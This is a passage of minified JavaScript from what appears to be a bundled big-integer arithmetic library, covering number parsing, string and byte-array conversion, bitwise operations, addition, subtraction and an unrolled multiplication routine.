L,h,R=0;if("be"===G)for(X=v.length-1,L=0;X>=0;X-=3)this.words[L]|=(h=v[X]|v[X-1]<<8|v[X-2]<<16)<<R&67108863,this.words[L+1]=h>>>26-R&67108863,(R+=24)>=26&&(R-=26,L++);else if("le"===G)for(X=0,L=0;X<v.length;X+=3)this.words[L]|=(h=v[X]|v[X+1]<<8|v[X+2]<<16)<<R&67108863,this.words[L+1]=h>>>26-R&67108863,(R+=24)>=26&&(R-=26,L++);return this._strip()},I.prototype._parseHex=function(v,P,G){this.length=Math.ceil((v.length-P)/6),this.words=new Array(this.length);for(var X=0;X<this.length;X++)this.words[X]=0;var R,L=0,h=0;if("be"===G)for(X=v.length-1;X>=P;X-=2)R=E(v,P,X)<<L,this.words[h]|=67108863&R,L>=18?(L-=18,this.words[h+=1]|=R>>>26):L+=8;else for(X=(v.length-P)%2==0?P+1:P;X<v.length;X+=2)R=E(v,P,X)<<L,this.words[h]|=67108863&R,L>=18?(L-=18,this.words[h+=1]|=R>>>26):L+=8;this._strip()},I.prototype._parseBase=function(v,P,G){this.words=[0],this.length=1;for(var X=0,L=1;L<=67108863;L*=P)X++;X--,L=L/P|0;for(var h=v.length-G,R=h%X,J=Math.min(h,h-R)+G,Z=0,ue=G;ue<J;ue+=X)Z=g(v,ue,ue+X,P),this.imuln(L),this.words[0]+Z<67108864?this.words[0]+=Z:this._iaddn(Z);if(0!==R){var Ie=1;for(Z=g(v,ue,v.length,P),ue=0;ue<R;ue++)Ie*=P;this.imuln(Ie),this.words[0]+Z<67108864?this.words[0]+=Z:this._iaddn(Z)}this._strip()},I.prototype.copy=function(v){v.words=new Array(this.length);for(var P=0;P<this.length;P++)v.words[P]=this.words[P];v.length=this.length,v.negative=this.negative,v.red=this.red},I.prototype._move=function(v){b(v,this)},I.prototype.clone=function(){var v=new I(null);return this.copy(v),v},I.prototype._expand=function(v){for(;this.length<v;)this.words[this.length++]=0;return this},I.prototype._strip=function(){for(;this.length>1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},"undefined"!=typeof Symbol&&"function"==typeof Symbol.for)try{I.prototype[Symbol.for("nodejs.util.inspect.custom")]=_}catch(A){I.prototype.inspect=_}else I.prototype.inspect=_;function _(){return(this.red?"<BN-R: ":"<BN: ")+this.toString(16)+">"}var y=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],M=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],p=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function x(A,v,P){P.negative=v.negative^A.negative;var G=A.length+v.length|0;P.length=G,G=G-1|0;var X=0|A.words[0],L=0|v.words[0],h=X*L,J=h/67108864|0;P.words[0]=67108863&h;for(var Z=1;Z<G;Z++){for(var ue=J>>>26,Ie=67108863&J,Ae=Math.min(Z,v.length-1),Ue=Math.max(0,Z-A.length+1);Ue<=Ae;Ue++)ue+=(h=(X=0|A.words[Z-Ue|0])*(L=0|v.words[Ue])+Ie)/67108864|0,Ie=67108863&h;P.words[Z]=0|Ie,J=0|ue}return 0!==J?P.words[Z]=0|J:P.length--,P._strip()}I.prototype.toString=function(v,P){var G;if(P=0|P||1,16===(v=v||10)||"hex"===v){G="";for(var X=0,L=0,h=0;h<this.length;h++){var R=this.words[h],J=(16777215&(R<<X|L)).toString(16);L=R>>>24-X&16777215,(X+=2)>=26&&(X-=26,h--),G=0!==L||h!==this.length-1?y[6-J.length]+J+G:J+G}for(0!==L&&(G=L.toString(16)+G);G.length%P!=0;)G="0"+G;return 0!==this.negative&&(G="-"+G),G}if(v===(0|v)&&v>=2&&v<=36){var Z=M[v],ue=p[v];G="";var Ie=this.clone();for(Ie.negative=0;!Ie.isZero();){var Ae=Ie.modrn(ue).toString(v);G=(Ie=Ie.idivn(ue)).isZero()?Ae+G:y[Z-Ae.length]+Ae+G}for(this.isZero()&&(G="0"+G);G.length%P!=0;)G="0"+G;return 0!==this.negative&&(G="-"+G),G}$(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var v=this.words[0];return 2===this.length?v+=67108864*this.words[1]:3===this.length&&1===this.words[2]?v+=4503599627370496+67108864*this.words[1]:this.length>2&&$(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-v:v},I.prototype.toJSON=function(){return this.toString(16,2)},Q&&(I.prototype.toBuffer=function(v,P){return this.toArrayLike(Q,v,P)}),I.prototype.toArray=function(v,P){return this.toArrayLike(Array,v,P)},I.prototype.toArrayLike=function(v,P,G){this._strip();var X=this.byteLength(),L=G||Math.max(1,X);$(X<=L,"byte array longer than desired length"),$(L>0,"Requested array length <= 0");var h=function(v,P){return v.allocUnsafe?v.allocUnsafe(P):new v(P)}(v,L);return this["_toArrayLike"+("le"===P?"LE":"BE")](h,X),h},I.prototype._toArrayLikeLE=function(v,P){for(var G=0,X=0,L=0,h=0;L<this.length;L++){var R=this.words[L]<<h|X;v[G++]=255&R,G<v.length&&(v[G++]=R>>8&255),G<v.length&&(v[G++]=R>>16&255),6===h?(G<v.length&&(v[G++]=R>>24&255),X=0,h=0):(X=R>>>24,h+=2)}if(G<v.length)for(v[G++]=X;G<v.length;)v[G++]=0},I.prototype._toArrayLikeBE=function(v,P){for(var G=v.length-1,X=0,L=0,h=0;L<this.length;L++){var R=this.words[L]<<h|X;v[G--]=255&R,G>=0&&(v[G--]=R>>8&255),G>=0&&(v[G--]=R>>16&255),6===h?(G>=0&&(v[G--]=R>>24&255),X=0,h=0):(X=R>>>24,h+=2)}if(G>=0)for(v[G--]=X;G>=0;)v[G--]=0},I.prototype._countBits=Math.clz32?function(v){return 32-Math.clz32(v)}:function(v){var P=v,G=0;return P>=4096&&(G+=13,P>>>=13),P>=64&&(G+=7,P>>>=7),P>=8&&(G+=4,P>>>=4),P>=2&&(G+=2,P>>>=2),G+P},I.prototype._zeroBits=function(v){if(0===v)return 26;var P=v,G=0;return 0==(8191&P)&&(G+=13,P>>>=13),0==(127&P)&&(G+=7,P>>>=7),0==(15&P)&&(G+=4,P>>>=4),0==(3&P)&&(G+=2,P>>>=2),0==(1&P)&&G++,G},I.prototype.bitLength=function(){var P=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+P},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var v=0,P=0;P<this.length;P++){var G=this._zeroBits(this.words[P]);if(v+=G,26!==G)break}return v},I.prototype.byteLength=function(){return Math.ceil(this.bitLength()/8)},I.prototype.toTwos=function(v){return 0!==this.negative?this.abs().inotn(v).iaddn(1):this.clone()},I.prototype.fromTwos=function(v){return this.testn(v-1)?this.notn(v).iaddn(1).ineg():this.clone()},I.prototype.isNeg=function(){return 0!==this.negative},I.prototype.neg=function(){return this.clone().ineg()},I.prototype.ineg=function(){return this.isZero()||(this.negative^=1),this},I.prototype.iuor=function(v){for(;this.length<v.length;)this.words[this.length++]=0;for(var P=0;P<v.length;P++)this.words[P]=this.words[P]|v.words[P];return this._strip()},I.prototype.ior=function(v){return $(0==(this.negative|v.negative)),this.iuor(v)},I.prototype.or=function(v){return this.length>v.length?this.clone().ior(v):v.clone().ior(this)},I.prototype.uor=function(v){return this.length>v.length?this.clone().iuor(v):v.clone().iuor(this)},I.prototype.iuand=function(v){var P;P=this.length>v.length?v:this;for(var G=0;G<P.length;G++)this.words[G]=this.words[G]&v.words[G];return this.length=P.length,this._strip()},I.prototype.iand=function(v){return $(0==(this.negative|v.negative)),this.iuand(v)},I.prototype.and=function(v){return this.length>v.length?this.clone().iand(v):v.clone().iand(this)},I.prototype.uand=function(v){return this.length>v.length?this.clone().iuand(v):v.clone().iuand(this)},I.prototype.iuxor=function(v){var P,G;this.length>v.length?(P=this,G=v):(P=v,G=this);for(var X=0;X<G.length;X++)this.words[X]=P.words[X]^G.words[X];if(this!==P)for(;X<P.length;X++)this.words[X]=P.words[X];return this.length=P.length,this._strip()},I.prototype.ixor=function(v){return $(0==(this.negative|v.negative)),this.iuxor(v)},I.prototype.xor=function(v){return this.length>v.length?this.clone().ixor(v):v.clone().ixor(this)},I.prototype.uxor=function(v){return this.length>v.length?this.clone().iuxor(v):v.clone().iuxor(this)},I.prototype.inotn=function(v){$("number"==typeof v&&v>=0);var P=0|Math.ceil(v/26),G=v%26;this._expand(P),G>0&&P--;for(var X=0;X<P;X++)this.words[X]=67108863&~this.words[X];return G>0&&(this.words[X]=~this.words[X]&67108863>>26-G),this._strip()},I.prototype.notn=function(v){return this.clone().inotn(v)},I.prototype.setn=function(v,P){$("number"==typeof v&&v>=0);var G=v/26|0,X=v%26;return this._expand(G+1),this.words[G]=P?this.words[G]|1<<X:this.words[G]&~(1<<X),this._strip()},I.prototype.iadd=function(v){var P,G,X;if(0!==this.negative&&0===v.negative)return this.negative=0,P=this.isub(v),this.negative^=1,this._normSign();if(0===this.negative&&0!==v.negative)return v.negative=0,P=this.isub(v),v.negative=1,P._normSign();this.length>v.length?(G=this,X=v):(G=v,X=this);for(var L=0,h=0;h<X.length;h++)this.words[h]=67108863&(P=(0|G.words[h])+(0|X.words[h])+L),L=P>>>26;for(;0!==L&&h<G.length;h++)this.words[h]=67108863&(P=(0|G.words[h])+L),L=P>>>26;if(this.length=G.length,0!==L)this.words[this.length]=L,this.length++;else if(G!==this)for(;h<G.length;h++)this.words[h]=G.words[h];return this},I.prototype.add=function(v){var P;return 0!==v.negative&&0===this.negative?(v.negative=0,P=this.sub(v),v.negative^=1,P):0===v.negative&&0!==this.negative?(this.negative=0,P=v.sub(this),this.negative=1,P):this.length>v.length?this.clone().iadd(v):v.clone().iadd(this)},I.prototype.isub=function(v){if(0!==v.negative){v.negative=0;var P=this.iadd(v);return v.negative=1,P._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(v),this.negative=1,this._normSign();var X,L,G=this.cmp(v);if(0===G)return this.negative=0,this.length=1,this.words[0]=0,this;G>0?(X=this,L=v):(X=v,L=this);for(var h=0,R=0;R<L.length;R++)h=(P=(0|X.words[R])-(0|L.words[R])+h)>>26,this.words[R]=67108863&P;for(;0!==h&&R<X.length;R++)h=(P=(0|X.words[R])+h)>>26,this.words[R]=67108863&P;if(0===h&&R<X.length&&X!==this)for(;R<X.length;R++)this.words[R]=X.words[R];return this.length=Math.max(this.length,R),X!==this&&(this.negative=1),this._strip()},I.prototype.sub=function(v){return this.clone().isub(v)};var S=function(v,P,G){var J,Z,ue,X=v.words,L=P.words,h=G.words,R=0,Ie=0|X[0],Ae=8191&Ie,Ue=Ie>>>13,Xe=0|X[1],He=8191&Xe,Be=Xe>>>13,qe=0|X[2],De=8191&qe,Ve=qe>>>13,ze=0|X[3],me=8191&ze,Ke=ze>>>13,rt=0|X[4],Ge=8191&rt,Qe=rt>>>13,ht=0|X[5],mt=8191&ht,lt=ht>>>13,ft=0|X[6],xe=8191&ft,We=ft>>>13,Je=0|X[7],Oe=8191&Je,Te=Je>>>13,Le=0|X[8],$e=8191&Le,st=Le>>>13,xt=0|X[9],pt=8191&xt,vt=xt>>>13,Wi=0|L[0],Ft=8191&Wi,zt=Wi>>>13,pa=0|L[1],Jt=8191&pa,Gt=pa>>>13,Co=0|L[2],jt=8191&Co,qt=Co>>>13,Qn=0|L[3],Kt=8191&Qn,Zt=Qn>>>13,Bo=0|L[4],ti=8191&Bo,ii=Bo>>>13,pn=0|L[5],Pt=8191&pn,Xt=pn>>>13,Ho=0|L[6],Qt=8191&Ho,ei=Ho>>>13,$o=0|L[7],ai=8191&$o,$t=$o>>>13,zo=0|L[8],Ut=8191&zo,Yt=zo>>>13,ha=0|L[9],Ha=8191&ha,Va=ha>>>13;G.negative=v.negative^P.negative,G.length=19;var co=(R+(J=Math.imul(Ae,Ft))|0)+((8191&(Z=(Z=Math.imul(Ae,zt))+Math.imul(Ue,Ft)|0))<<13)|0;R=((ue=Math.imul(Ue,zt))+(Z>>>13)|0)+(co>>>26)|0,co&=67108863,J=Math.imul(He,Ft),Z=(Z=Math.imul(He,zt))+Math.imul(Be,Ft)|0,ue=Math.imul(Be,zt);var io=(R+(J=J+Math.imul(Ae,Jt)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,Gt)|0)+Math.imul(Ue,Jt)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,Gt)|0)+(Z>>>13)|0)+(io>>>26)|0,io&=67108863,J=Math.imul(De,Ft),Z=(Z=Math.imul(De,zt))+Math.imul(Ve,Ft)|0,ue=Math.imul(Ve,zt),J=J+Math.imul(He,Jt)|0,Z=(Z=Z+Math.imul(He,Gt)|0)+Math.imul(Be,Jt)|0,ue=ue+Math.imul(Be,Gt)|0;var yo=(R+(J=J+Math.imul(Ae,jt)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,qt)|0)+Math.imul(Ue,jt)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,qt)|0)+(Z>>>13)|0)+(yo>>>26)|0,yo&=67108863,J=Math.imul(me,Ft),Z=(Z=Math.imul(me,zt))+Math.imul(Ke,Ft)|0,ue=Math.imul(Ke,zt),J=J+Math.imul(De,Jt)|0,Z=(Z=Z+Math.imul(De,Gt)|0)+Math.imul(Ve,Jt)|0,ue=ue+Math.imul(Ve,Gt)|0,J=J+Math.imul(He,jt)|0,Z=(Z=Z+Math.imul(He,qt)|0)+Math.imul(Be,jt)|0,ue=ue+Math.imul(Be,qt)|0;var Vn=(R+(J=J+Math.imul(Ae,Kt)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,Zt)|0)+Math.imul(Ue,Kt)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,Zt)|0)+(Z>>>13)|0)+(Vn>>>26)|0,Vn&=67108863,J=Math.imul(Ge,Ft),Z=(Z=Math.imul(Ge,zt))+Math.imul(Qe,Ft)|0,ue=Math.imul(Qe,zt),J=J+Math.imul(me,Jt)|0,Z=(Z=Z+Math.imul(me,Gt)|0)+Math.imul(Ke,Jt)|0,ue=ue+Math.imul(Ke,Gt)|0,J=J+Math.imul(De,jt)|0,Z=(Z=Z+Math.imul(De,qt)|0)+Math.imul(Ve,jt)|0,ue=ue+Math.imul(Ve,qt)|0,J=J+Math.imul(He,Kt)|0,Z=(Z=Z+Math.imul(He,Zt)|0)+Math.imul(Be,Kt)|0,ue=ue+Math.imul(Be,Zt)|0;var Eo=(R+(J=J+Math.imul(Ae,ti)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,ii)|0)+Math.imul(Ue,ti)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,ii)|0)+(Z>>>13)|0)+(Eo>>>26)|0,Eo&=67108863,J=Math.imul(mt,Ft),Z=(Z=Math.imul(mt,zt))+Math.imul(lt,Ft)|0,ue=Math.imul(lt,zt),J=J+Math.imul(Ge,Jt)|0,Z=(Z=Z+Math.imul(Ge,Gt)|0)+Math.imul(Qe,Jt)|0,ue=ue+Math.imul(Qe,Gt)|0,J=J+Math.imul(me,jt)|0,Z=(Z=Z+Math.imul(me,qt)|0)+Math.imul(Ke,jt)|0,ue=ue+Math.imul(Ke,qt)|0,J=J+Math.imul(De,Kt)|0,Z=(Z=Z+Math.imul(De,Zt)|0)+Math.imul(Ve,Kt)|0,ue=ue+Math.imul(Ve,Zt)|0,J=J+Math.imul(He,ti)|0,Z=(Z=Z+Math.imul(He,ii)|0)+Math.imul(Be,ti)|0,ue=ue+Math.imul(Be,ii)|0;var Pn=(R+(J=J+Math.imul(Ae,Pt)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,Xt)|0)+Math.imul(Ue,Pt)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,Xt)|0)+(Z>>>13)|0)+(Pn>>>26)|0,Pn&=67108863,J=Math.imul(xe,Ft),Z=(Z=Math.imul(xe,zt))+Math.imul(We,Ft)|0,ue=Math.imul(We,zt),J=J+Math.imul(mt,Jt)|0,Z=(Z=Z+Math.imul(mt,Gt)|0)+Math.imul(lt,Jt)|0,ue=ue+Math.imul(lt,Gt)|0,J=J+Math.imul(Ge,jt)|0,Z=(Z=Z+Math.imul(Ge,qt)|0)+Math.imul(Qe,jt)|0,ue=ue+Math.imul(Qe,qt)|0,J=J+Math.imul(me,Kt)|0,Z=(Z=Z+Math.imul(me,Zt)|0)+Math.imul(Ke,Kt)|0,ue=ue+Math.imul(Ke,Zt)|0,J=J+Math.imul(De,ti)|0,Z=(Z=Z+Math.imul(De,ii)|0)+Math.imul(Ve,ti)|0,ue=ue+Math.imul(Ve,ii)|0,J=J+Math.imul(He,Pt)|0,Z=(Z=Z+Math.imul(He,Xt)|0)+Math.imul(Be,Pt)|0,ue=ue+Math.imul(Be,Xt)|0;var lo=(R+(J=J+Math.imul(Ae,Qt)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,ei)|0)+Math.imul(Ue,Qt)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,ei)|0)+(Z>>>13)|0)+(lo>>>26)|0,lo&=67108863,J=Math.imul(Oe,Ft),Z=(Z=Math.imul(Oe,zt))+Math.imul(Te,Ft)|0,ue=Math.imul(Te,zt),J=J+Math.imul(xe,Jt)|0,Z=(Z=Z+Math.imul(xe,Gt)|0)+Math.imul(We,Jt)|0,ue=ue+Math.imul(We,Gt)|0,J=J+Math.imul(mt,jt)|0,Z=(Z=Z+Math.imul(mt,qt)|0)+Math.imul(lt,jt)|0,ue=ue+Math.imul(lt,qt)|0,J=J+Math.imul(Ge,Kt)|0,Z=(Z=Z+Math.imul(Ge,Zt)|0)+Math.imul(Qe,Kt)|0,ue=ue+Math.imul(Qe,Zt)|0,J=J+Math.imul(me,ti)|0,Z=(Z=Z+Math.imul(me,ii)|0)+Math.imul(Ke,ti)|0,ue=ue+Math.imul(Ke,ii)|0,J=J+Math.imul(De,Pt)|0,Z=(Z=Z+Math.imul(De,Xt)|0)+Math.imul(Ve,Pt)|0,ue=ue+Math.imul(Ve,Xt)|0,J=J+Math.imul(He,Qt)|0,Z=(Z=Z+Math.imul(He,ei)|0)+Math.imul(Be,Qt)|0,ue=ue+Math.imul(Be,ei)|0;var ao=(R+(J=J+Math.imul(Ae,ai)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,$t)|0)+Math.imul(Ue,ai)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,$t)|0)+(Z>>>13)|0)+(ao>>>26)|0,ao&=67108863,J=Math.imul($e,Ft),Z=(Z=Math.imul($e,zt))+Math.imul(st,Ft)|0,ue=Math.imul(st,zt),J=J+Math.imul(Oe,Jt)|0,Z=(Z=Z+Math.imul(Oe,Gt)|0)+Math.imul(Te,Jt)|0,ue=ue+Math.imul(Te,Gt)|0,J=J+Math.imul(xe,jt)|0,Z=(Z=Z+Math.imul(xe,qt)|0)+Math.imul(We,jt)|0,ue=ue+Math.imul(We,qt)|0,J=J+Math.imul(mt,Kt)|0,Z=(Z=Z+Math.imul(mt,Zt)|0)+Math.imul(lt,Kt)|0,ue=ue+Math.imul(lt,Zt)|0,J=J+Math.imul(Ge,ti)|0,Z=(Z=Z+Math.imul(Ge,ii)|0)+Math.imul(Qe,ti)|0,ue=ue+Math.imul(Qe,ii)|0,J=J+Math.imul(me,Pt)|0,Z=(Z=Z+Math.imul(me,Xt)|0)+Math.imul(Ke,Pt)|0,ue=ue+Math.imul(Ke,Xt)|0,J=J+Math.imul(De,Qt)|0,Z=(Z=Z+Math.imul(De,ei)|0)+Math.imul(Ve,Qt)|0,ue=ue+Math.imul(Ve,ei)|0,J=J+Math.imul(He,ai)|0,Z=(Z=Z+Math.imul(He,$t)|0)+Math.imul(Be,ai)|0,ue=ue+Math.imul(Be,$t)|0;var bo=(R+(J=J+Math.imul(Ae,Ut)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,Yt)|0)+Math.imul(Ue,Ut)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,Yt)|0)+(Z>>>13)|0)+(bo>>>26)|0,bo&=67108863,J=Math.imul(pt,Ft),Z=(Z=Math.imul(pt,zt))+Math.imul(vt,Ft)|0,ue=Math.imul(vt,zt),J=J+Math.imul($e,Jt)|0,Z=(Z=Z+Math.imul($e,Gt)|0)+Math.imul(st,Jt)|0,ue=ue+Math.imul(st,Gt)|0,J=J+Math.imul(Oe,jt)|0,Z=(Z=Z+Math.imul(Oe,qt)|0)+Math.imul(Te,jt)|0,ue=ue+Math.imul(Te,qt)|0,J=J+Math.imul(xe,Kt)|0,Z=(Z=Z+Math.imul(xe,Zt)|0)+Math.imul(We,Kt)|0,ue=ue+Math.imul(We,Zt)|0,J=J+Math.imul(mt,ti)|0,Z=(Z=Z+Math.imul(mt,ii)|0)+Math.imul(lt,ti)|0,ue=ue+Math.imul(lt,ii)|0,J=J+Math.imul(Ge,Pt)|0,Z=(Z=Z+Math.imul(Ge,Xt)|0)+Math.imul(Qe,Pt)|0,ue=ue+Math.imul(Qe,Xt)|0,J=J+Math.imul(me,Qt)|0,Z=(Z=Z+Math.imul(me,ei)|0)+Math.imul(Ke,Qt)|0,ue=ue+Math.imul(Ke,ei)|0,J=J+Math.imul(De,ai)|0,Z=(Z=Z+Math.imul(De,$t)|0)+Math.imul(Ve,ai)|0,ue=ue+Math.imul(Ve,$t)|0,J=J+Math.imul(He,Ut)|0,Z=(Z=Z+Math.imul(He,Yt)|0)+Math.imul(Be,Ut)|0,ue=ue+Math.imul(Be,Yt)|0;var $n=(R+(J=J+Math.imul(Ae,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ae,Va)|0)+Math.imul(Ue,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(Ue,Va)|0)+(Z>>>13)|0)+($n>>>26)|0,$n&=67108863,J=Math.imul(pt,Jt),Z=(Z=Math.imul(pt,Gt))+Math.imul(vt,Jt)|0,ue=Math.imul(vt,Gt),J=J+Math.imul($e,jt)|0,Z=(Z=Z+Math.imul($e,qt)|0)+Math.imul(st,jt)|0,ue=ue+Math.imul(st,qt)|0,J=J+Math.imul(Oe,Kt)|0,Z=(Z=Z+Math.imul(Oe,Zt)|0)+Math.imul(Te,Kt)|0,ue=ue+Math.imul(Te,Zt)|0,J=J+Math.imul(xe,ti)|0,Z=(Z=Z+Math.imul(xe,ii)|0)+Math.imul(We,ti)|0,ue=ue+Math.imul(We,ii)|0,J=J+Math.imul(mt,Pt)|0,Z=(Z=Z+Math.imul(mt,Xt)|0)+Math.imul(lt,Pt)|0,ue=ue+Math.imul(lt,Xt)|0,J=J+Math.imul(Ge,Qt)|0,Z=(Z=Z+Math.imul(Ge,ei)|0)+Math.imul(Qe,Qt)|0,ue=ue+Math.imul(Qe,ei)|0,J=J+Math.imul(me,ai)|0,Z=(Z=Z+Math.imul(me,$t)|0)+Math.imul(Ke,ai)|0,ue=ue+Math.imul(Ke,$t)|0,J=J+Math.imul(De,Ut)|0,Z=(Z=Z+Math.imul(De,Yt)|0)+Math.imul(Ve,Ut)|0,ue=ue+Math.imul(Ve,Yt)|0;var Do=(R+(J=J+Math.imul(He,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(He,Va)|0)+Math.imul(Be,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(Be,Va)|0)+(Z>>>13)|0)+(Do>>>26)|0,Do&=67108863,J=Math.imul(pt,jt),Z=(Z=Math.imul(pt,qt))+Math.imul(vt,jt)|0,ue=Math.imul(vt,qt),J=J+Math.imul($e,Kt)|0,Z=(Z=Z+Math.imul($e,Zt)|0)+Math.imul(st,Kt)|0,ue=ue+Math.imul(st,Zt)|0,J=J+Math.imul(Oe,ti)|0,Z=(Z=Z+Math.imul(Oe,ii)|0)+Math.imul(Te,ti)|0,ue=ue+Math.imul(Te,ii)|0,J=J+Math.imul(xe,Pt)|0,Z=(Z=Z+Math.imul(xe,Xt)|0)+Math.imul(We,Pt)|0,ue=ue+Math.imul(We,Xt)|0,J=J+Math.imul(mt,Qt)|0,Z=(Z=Z+Math.imul(mt,ei)|0)+Math.imul(lt,Qt)|0,ue=ue+Math.imul(lt,ei)|0,J=J+Math.imul(Ge,ai)|0,Z=(Z=Z+Math.imul(Ge,$t)|0)+Math.imul(Qe,ai)|0,ue=ue+Math.imul(Qe,$t)|0,J=J+Math.imul(me,Ut)|0,Z=(Z=Z+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0,ue=ue+Math.imul(Ke,Yt)|0;var Mo=(R+(J=J+Math.imul(De,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(De,Va)|0)+Math.imul(Ve,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(Ve,Va)|0)+(Z>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,J=Math.imul(pt,Kt),Z=(Z=Math.imul(pt,Zt))+Math.imul(vt,Kt)|0,ue=Math.imul(vt,Zt),J=J+Math.imul($e,ti)|0,Z=(Z=Z+Math.imul($e,ii)|0)+Math.imul(st,ti)|0,ue=ue+Math.imul(st,ii)|0,J=J+Math.imul(Oe,Pt)|0,Z=(Z=Z+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,ue=ue+Math.imul(Te,Xt)|0,J=J+Math.imul(xe,Qt)|0,Z=(Z=Z+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,ue=ue+Math.imul(We,ei)|0,J=J+Math.imul(mt,ai)|0,Z=(Z=Z+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,ue=ue+Math.imul(lt,$t)|0,J=J+Math.imul(Ge,Ut)|0,Z=(Z=Z+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0,ue=ue+Math.imul(Qe,Yt)|0;var no=(R+(J=J+Math.imul(me,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(me,Va)|0)+Math.imul(Ke,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(Ke,Va)|0)+(Z>>>13)|0)+(no>>>26)|0,no&=67108863,J=Math.imul(pt,ti),Z=(Z=Math.imul(pt,ii))+Math.imul(vt,ti)|0,ue=Math.imul(vt,ii),J=J+Math.imul($e,Pt)|0,Z=(Z=Z+Math.imul($e,Xt)|0)+Math.imul(st,Pt)|0,ue=ue+Math.imul(st,Xt)|0,J=J+Math.imul(Oe,Qt)|0,Z=(Z=Z+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,ue=ue+Math.imul(Te,ei)|0,J=J+Math.imul(xe,ai)|0,Z=(Z=Z+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,ue=ue+Math.imul(We,$t)|0,J=J+Math.imul(mt,Ut)|0,Z=(Z=Z+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0,ue=ue+Math.imul(lt,Yt)|0;var Kn=(R+(J=J+Math.imul(Ge,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(Ge,Va)|0)+Math.imul(Qe,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(Qe,Va)|0)+(Z>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,J=Math.imul(pt,Pt),Z=(Z=Math.imul(pt,Xt))+Math.imul(vt,Pt)|0,ue=Math.imul(vt,Xt),J=J+Math.imul($e,Qt)|0,Z=(Z=Z+Math.imul($e,ei)|0)+Math.imul(st,Qt)|0,ue=ue+Math.imul(st,ei)|0,J=J+Math.imul(Oe,ai)|0,Z=(Z=Z+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,ue=ue+Math.imul(Te,$t)|0,J=J+Math.imul(xe,Ut)|0,Z=(Z=Z+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0,ue=ue+Math.imul(We,Yt)|0;var Sa=(R+(J=J+Math.imul(mt,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(mt,Va)|0)+Math.imul(lt,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(lt,Va)|0)+(Z>>>13)|0)+(Sa>>>26)|0,Sa&=67108863,J=Math.imul(pt,Qt),Z=(Z=Math.imul(pt,ei))+Math.imul(vt,Qt)|0,ue=Math.imul(vt,ei),J=J+Math.imul($e,ai)|0,Z=(Z=Z+Math.imul($e,$t)|0)+Math.imul(st,ai)|0,ue=ue+Math.imul(st,$t)|0,J=J+Math.imul(Oe,Ut)|0,Z=(Z=Z+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0,ue=ue+Math.imul(Te,Yt)|0;var ra=(R+(J=J+Math.imul(xe,Ha)|0)|0)+((8191&(Z=(Z=Z+Math.imul(xe,Va)|0)+Math.imul(We,Ha)|0))<<13)|0;R=((ue=ue+Math.imul(We,Va)|0)+(Z>>>13)|0)+(ra>>>26)|0,ra&=67108863,J=Math.imul(pt,ai),Z=(Z=Math.imul(pt,$t))+Math.imul(vt,ai)|0,ue=Math.imul(vt,$t),J=J+Math.imul($e,Ut)|0,Z=(Z=Z+Math.imul($e,Yt)|0)+Math.imul(st,Ut)|0,ue=ue+Math.imul(st,Yt)|0;var 